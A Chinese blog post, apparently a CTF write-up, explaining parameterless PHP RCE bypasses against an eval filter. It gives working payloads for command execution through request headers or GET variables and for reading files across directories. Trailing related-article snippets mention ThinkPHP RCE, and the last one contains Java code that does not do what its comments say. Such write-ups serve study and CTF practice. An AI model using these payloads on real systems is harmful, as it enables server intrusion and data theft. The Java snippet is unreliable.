php无参执行RCE

最新推荐文章于 2025-03-28 20:10:33 发布
最新推荐文章于 2025-03-28 20:10:33 发布
阅读量3.2k 收藏 11
点赞数 4
分类专栏: 经验分享 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54648419/article/details/123690383
版权

前言

<?php
# @Author: h1xa

highlight_file(__FILE__);

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}
?>

一般来说当我们可以控制或自己上传一个木马后,就可以进行任意命令执行,但像上面这样/[^\W]+\((?R)?\)/的正则过滤方式,我们不能输入任何参数,这样想绕过的话一个大的思路就是通过套娃,通过让一个函数的返回值作为另一个函数的参数,也就是这样a(b(c()));,最终达到rce的效果,下面列几种绕过方法

绕过

使用getallheaders()函数

在这里插入图片描述

<?php

$a=getallheaders();
var_dump($a);

array (size=14)
  'Sec-Gpc' => string '1' (length=1)
  'Dnt' => string '1' (length=1)
  'Sec-Fetch-User' => string '?1' (length=2)
  'Sec-Fetch-Site' => string 'none' (length=4)
  'Sec-Fetch-Mode' => string 'navigate' (length=8)
  'Sec-Fetch-Dest' => string 'document' (length=8)
  'Upgrade-Insecure-Requests' => string '1' (length=1)
  'Cookie' => string '---------------' (length=50)
  'Connection' => string 'close' (length=5)
  'Accept-Encoding' => string 'gzip, deflate' (length=13)
  'Accept-Language' => string 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' (length=59)
  'Accept' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' (length=85)
  'User-Agent' => string 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0' (length=78)
  'Host' => string 'localhost' (length=9)

本地抓包测试,与burp中内容完全相同,这里我们知道由于包的请求头信息可控,如果能够执行我们指定的请求头内容,就能实现代码执行。这里我们还需要一个函数来从请求头数组中拿到我们需要的请求头元素,并能够执行它,这里用到end,后拿var_dump把它显示出了

在这里插入图片描述

这里在本地做一个测试
在这里插入图片描述

这里下面的值完全由我们控制,但是它的位置不在最后一位end函数没法执行,这里给它挪了下位置跑到最后一位了,如果这里能移到第一位的话可以先移到第一位然后使用array_reverse给它调换到最后一位
在这里插入图片描述
这里本地是window,一开始试的ls命令一直没反应。我们发现成功命令执行

?code=eval(end(getallheaders()));
Content-Type: system('dir');

在这里插入图片描述

使用get_defined_vars()

在这里插入图片描述
返回由所有已定义变量所组成的数组,会返回$_GET$_POST$_COOKIE$_FILES,顺序也是这样的

在这里插入图片描述
这里以get为例,再加一个参数
在这里插入图片描述

这里这么多变量,需要再使用current函数,它是用来返回数组中的当前单元, 默认取第一个值,所以取出get后使用同样的方法

?code=eval(end(current(get_defined_vars())));&test=system('dir');

在这里插入图片描述

使用session_start()+session_id()

仅限php7以下的版本

在这里插入图片描述
在这里插入图片描述
使用session_start()启动session机制然后通过session_id()读取id,这里偏向于文件读取,PHPSESSID也都是数字字母,所有需要编码输入

?code=show_source(session_id(session_start())); 
Cookie: PHPSESSID=index.php

版本问题不演示了。

使用scandir实现文件读取同级文件

这个应该是最常见的,print_r(scandir('.')); 就表示获取当前目录下的文件,但是由于正则表达式限制,不能加参数,所以这里引入current() 返回数组中的当前单元(localeconv())localeconv()函数返回一包含本地数字及货币格式信息的数组,current() 返回数组中的当前单元(pos也是和current一样)
在这里插入图片描述

因为不能输入参数,所以这里利用array_flip()函数将读取当前目录的键和值进行反转,然后利用array_rand()来随机获得就能得到flag.php

在这里插入图片描述
这里也可以通过array_reverse来逆转数组,通过next()函数获取下一个值,最后通过文件读取函数读取内容
在这里插入图片描述

通过dirname()实现任意文件读取

这里用到一个重点就是dirname()函数,使用它对目录进行执行的话就会返回上级目录,演示一下

var_dump(scandir(getcwd()));
var_dump(scandir(dirname(dirname(dirname(getcwd())))));

在这里插入图片描述
在这里插入图片描述

这里只是看见根目录,该怎么到达这个目录呢,网上有说到用chdir

var_dump(scandir(chdir(dirname(dirname(dirname(getcwd()))))));

在这里插入图片描述
但是这里返回bool值所以报错,这里ctfshow的大佬利用了一个特性:readfileshow_source
readfile第二个参数不设定为true,则不会寻找include_path里面的文件进行读取,而show_source默认情况下会包含include_path,所以直接给出payload

show_source(array_rand(array_flip(scandir(array_rand(array_flip(str_split(set_include_path(dirname(dirname(dirname(getcwd())))))))))));

这里用set_include_path函数同时实现了两个功能。

  1. 设置文件包含路径,方便show_source在其他目录进行读取
  2. 返回. :/usr/local/php

利用array_rand不断执行它的目的是得到一个/,然后进入根目录后就可以再通过反转随机来getflag,所以这里两个rand函数,getflag需要它两同时匹配到,那得到flag几率就差不多1%了

使用getenv()

php有很多超全局变量

$GLOBALS
$_SERVER
$_GET
$_POST
$_FILES
$_COOKIE
$_SESSION
$_REQUEST
$_ENV

利用array_fliparray_rand来爆破getenv()环境变量的列表,拿到我们指定位置想要的恶意参数,个人觉得挺离谱挺的一个办法

参考PHP Parametric Function RCE
参考CTF|无参数RCE(一)
ctfshow平台

【网络安全 | 代码审计】PHP无参数RCE
等风来
09-17 2671
一般情况下,RCE需要通过传递特定的输入(如URL数、POST请求数据、表单数据等)来触发漏洞并执行恶意代码。而无参数RCE是一种特殊的远程代码执行漏洞,它的特点是通过调用多个函数(或利用系统中已有的代码路径)来实现远程代码执行,而无需显式的数。
php无参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 2078
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
PHP无参数RCE
weixin_43610673的博客
03-14 3069
无参数函数RCE,即在不使用数的条件下,仅使用函数进行REC。 如:代码中有 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/ 对于...
RCE(自增、取反、异或)
最新发布
long_mingyue的博客
03-28 1073
也就是说,`'a'++ => 'b'`,`'b'++ => 'c'`... 所以,我们只要能拿到一个变量,其值为`a`,通过自增操作即可获得a-z中所有字符。// 输出:%8F%97%8F%96%91%99%90^%FF%FF%FF%FF%FF%FF%FF。输出:%8F%97%8F%96%91%99%90^%FF%FF%FF%FF%FF%FF%FF。若将取反后的字符再次取反,即可还原原始字符:~~'A' → 'A'
phprce,php中无函数的RCE
weixin_30920907的博客
03-17 367
学习一下php中无符号的问题。1.无参数}else{show_source(__FILE__);}?>这里调用函数只能是code(a()) 也就是括号中不能含有数。http-header传在session_id中设置我们想要输入的RCE,达到传的目的,但是第一点需要session_start()开启session会话。payload:code=eval(hex2bin(session_...
PHPRCE
m0_63045593的博客
04-22 1026
PHPRCE <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store
初探无参数RCE
weixin_46330722的博客
12-07 3001
概念 所谓无参数RCE,就是通过没有数的函数达到命令执行的目的。这类题目的关键代码一般长这样,后面都用这串代码当题目测试 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); } ?> 简单解释一下这串代码。这串代码就是检查了我们通过GET方式传入的exp数的值,如果传进去的值是传进去的值是一个字符串接一个(),那么这个字符串就会被替换为空
一天一道ctf 第21天(无RCE GitHack)
scrawman的博客
04-11 464
[GXYCTF2019]禁止套娃 .git源码泄露,这里我用dirsearch是没扫出来这个文件的。 用GitHacker这个工具可以查看泄露的.git文件,linux里(我用的是kali)命令行输入git clone https://github.com/lijiejie/GitHack.git 下载,进入GitHack文件夹,命令行输入python GitHack.py http://e3899c1b-f6d8-4f65-8408-46b968e41c33.node3.buuoj.cn/.git/就能得
CTFHub远程执行RCE
m0_57379855的博客
03-17 1333
CTFHub远程执行RCEeval执行命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习文件包含php://input远程包含读取源代码 eval执行 命令注入 127.0.0.1;cat 121931294031970.php 127.0.0.1;cat 121931294031970.php|base64 获得flag 过滤cat 其他查看文件的命令 127.0.0.1;ls 127.0.0.1;less flag_198392751413959.php|base
PHP RCE
LYINJAda的博客
05-10 483
简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。进入场景可以看到,这个网站的框架是ThinkPHP5版本,上网去查找这个版本的漏洞,发现确实存在:ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。可以看到准确来说这个框架是5.0.20版本,再去网上查找对应版本的payload。
RCE
qq_74240553的博客
01-25 537
CTF无参数
PHP_RCE
The code way of kinnisoy
03-22 4242
常用函数: system(); scandir(); fopen("",""); url代码执行payload /?url= $g=scandir(%22../../../%22)[7]; $f=fopen(%22../../../$g%22,%22r%22); while(!feof($f)) { echo%20 fgetc($f); }// %20 %22 "
php无参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 639
前言最近做了一些 php 无参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
php入门rce
五分之一世纪
08-06 1570
文章目录(1)什么是rce(2)php中的命令执行(3)php中代码执行的情况(4)一般的过滤方法(5)一般绕过方法 (1)什么是rce RCE(remote command/code execute)。分为远程命令执行ping以及远程代码执行evel。漏洞出现的原因是没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 (2)php中的命
php_rce-攻防世界
szhangliwenya的博客
03-26 1538
该漏洞是由于ThinkPHP5在处理控制器传时,没有对数进行充分的过滤与验证,导致恶意用户可以通过提交恶意数据,构造出一个带有PHP函数的控制器方法,并通过URL数的形式访问该方法,从而触发远程代码执行漏洞。远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。数通常用于指定ThinkPHP框架中的模块/控制器/方法。服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。查看 flag目录下的文件。
REC
qq_50613938的博客
10-25 294
REC我个人理解就是命令执行函数的意思 无rce,其实就是没有函数并且执行函数命令的情况,大多数就是因为上面的这一类的数的出现而直接不能使用数,所以让我们只能使用a(b());的形式而不能是a(‘5’);, 而用什么来传递数呢?,一般就是get和post是最常见的,其次就是httpheaders, 上面图片里面的,就是把数都匹配成空,所以我们只能使用一些没有数也能执行的函数来执行命令 ?exp=highlight_file(next(array_reverse(scandir(current(l
php rce和绕过
m0_73973498的博客
10-08 3715
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
无参数rce
qi_SJQ_的博客
08-10 314
getcwd():返回当前目录的绝对路径------返回路径 scandir() :列出指定路径中的文件和目录,返回的是数组!-----利用路径(目录) print_r() :以易于理解的格式打印变量-----输出 怎么构造? localeconv() :返回一包含本地数字及货币格式信息的数组,而数组第一项就是".",因此要再用一个函数取出这个点。可以current(localeconv())返回“.”。 故:var_dump(scandir(current(localeconv())));----遍历当
php_rce(攻防世界)
赶不上早饭的博客
10-07 268
php_rce 正文 打开链接出现如图 看到这题首先搜索一下thinkphp V5,可以搜到关于thinkphp V5的漏洞 ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。受影响的版本包括5.0和5.1版本。 存在漏洞 ?s=index
rce如何读取倒数第三个文件
10-14
在Java中,如果你想要从当前目录下读取倒数第三个文件,通常你会遍历一个文件列表来找到它。由于没有数化输入流(如`FileInputStream`),你需要先获取到文件夹路径,然后动态地生成文件名序列。以下是一个简单的示例,假设文件名是连续递增的: ```java import java.io.*; import java.nio.file.*; public class Main { public static void main(String[] args) { String directoryPath = "."; // 当前目录 int indexToRead = 2; // 倒数第三个文件 try { Path dirPath = Paths.get(directoryPath); Files.walk(dirPath) .sorted(Comparator.naturalOrder()) // 按照名称排序 .limit(indexToRead + 1) // 取出前三条(包括倒数第三个) .map(Paths::get) // 将Path转换为File .forEach((file) -> { try (BufferedReader reader = new BufferedReader(new FileReader(file))) { String content; while ((content = reader.readLine()) != null) { System.out.println(content); } } catch (IOException e) { System.err.println("Error reading file: " + e.getMessage()); } }); } catch (IOException e) { System.err.println("Failed to read files: " + e.getMessage()); } } } ``` 在这个例子中,我们首先获取当前目录`Paths.get(".")`,然后通过`Files.walk()`迭代所有子文件,并按名称排序。`limit(indexToRead + 1)`限制结果只取前三项,最后逐个打开并读取内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值